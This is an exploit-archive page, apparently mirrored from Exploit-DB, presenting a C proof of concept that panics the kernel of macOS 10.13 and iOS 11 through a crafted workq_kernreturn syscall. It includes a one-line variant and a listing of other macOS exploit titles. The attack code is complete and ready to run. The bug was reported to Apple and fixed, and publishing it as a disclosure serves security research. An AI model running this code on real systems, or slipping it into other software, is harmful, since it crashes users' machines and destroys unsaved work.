Menu

Search for hundreds of thousands of exploits

"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)"

Author

"Fabiano Anemone"

Platform

macos

Release date

2018-11-20

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
# Exploit Title: MacOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
# Date: 2018-07-30
# Exploit Author: Fabiano Anemone
# Vendor Homepage: https://www.apple.com/
# Version: iOS 11.4.1 / MacOS 10.13.6
# Tested on: iOS / MacOS
# CVE: Not assigned
# Tweet: https://twitter.com/anoane/status/1048549170217451520

# iOS 11 / MacOS 10.13 - workq_kernreturn syscall local DoS
# workq_kernreturn_dos.c
# workq_kernreturn_dos
# Created by FABIANO ANEMONE (@ on 7/30/18.
# Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved.
# Reported to product-security@apple.com on 7/30/18
# Fixed in Mojave.
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/errno.h>

#define WQOPS_THREAD_WORKLOOP_RETURN 0x100    /* parks the thread after delivering the passed kevent array */

int workq_kernreturn(int options, user_addr_t item, int affinity, int prio) {
    return syscall(SYS_workq_kernreturn, options, item, affinity, prio);
}

int main(int argc, const char * argv[]) {
    //short version that fits one tweet:
    //syscall(368,256,1,1);
    
    errno = 0;
    user_addr_t any_non_zero_address = 1;
    int res = workq_kernreturn(WQOPS_THREAD_WORKLOOP_RETURN, any_non_zero_address, 1, 0);
    // MacOS 10.13.X and iOS 11.X will panic at this point
    printf("workq_kernreturn: %d - res: %d - errno: %d\n", 0, res, errno);
    return 0;
}
Release Date Title Type Platform Author
2019-08-05 "macOS iMessage - Heap Overflow when Deserializing" dos macos "Google Security Research"
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-03-01 "macOS XNU - Copy-on-Write Behavior Bypass via Mount of User-Owned Filesystem Image" dos macos "Google Security Research"
2019-02-13 "Apple macOS 10.13.5 - Local Privilege Escalation" local macos Synacktiv
2019-02-20 "FaceTime - Texture Processing Memory Corruption" dos macos "Google Security Research"
2019-01-31 "macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File" dos macos "Google Security Research"
2019-01-24 "Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)" dos macos "Saeed Hasanzadeh"
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-20 "Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)" dos macos "Fabiano Anemone"
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-13 "CuteFTP Mac 3.1 - Denial of Service (PoC)" dos macos "Yair Rodríguez Aparicio"
2018-11-06 "FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption" dos macos "Google Security Research"
2018-11-06 "FaceTime - 'readSPSandGetDecoderParams' Stack Corruption" dos macos "Google Security Research"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
2018-05-30 "Yosoro 1.0.4 - Remote Code Execution" webapps macos "Carlo Pelliccioni"
2017-02-24 "Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting" webapps macos "Google Security Research"
2017-06-06 "Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution" remote macos saelo
2017-05-04 "Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free" remote macos "saelo & niklasb"
2017-02-23 "Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read" remote macos "Google Security Research"
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-03-20 "Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation" local macos "Google Security Research"
2017-01-16 "Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation" local macos "Brandon Azad"
2017-12-07 "Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak" local macos "Brandon Azad"
2017-11-28 "Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation" local macos Lemiorhan
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
Release Date Title Type Platform Author
2018-11-20 "Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)" dos macos "Fabiano Anemone"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45891/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/45891/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/45891/40394/apple-macos-1013-workq-kernreturn-denial-of-service-poc/download/", "exploit_id": "45891", "exploit_description": "\"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)\"", "exploit_date": "2018-11-20", "exploit_author": "\"Fabiano Anemone\"", "exploit_type": "dos", "exploit_platform": "macos", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse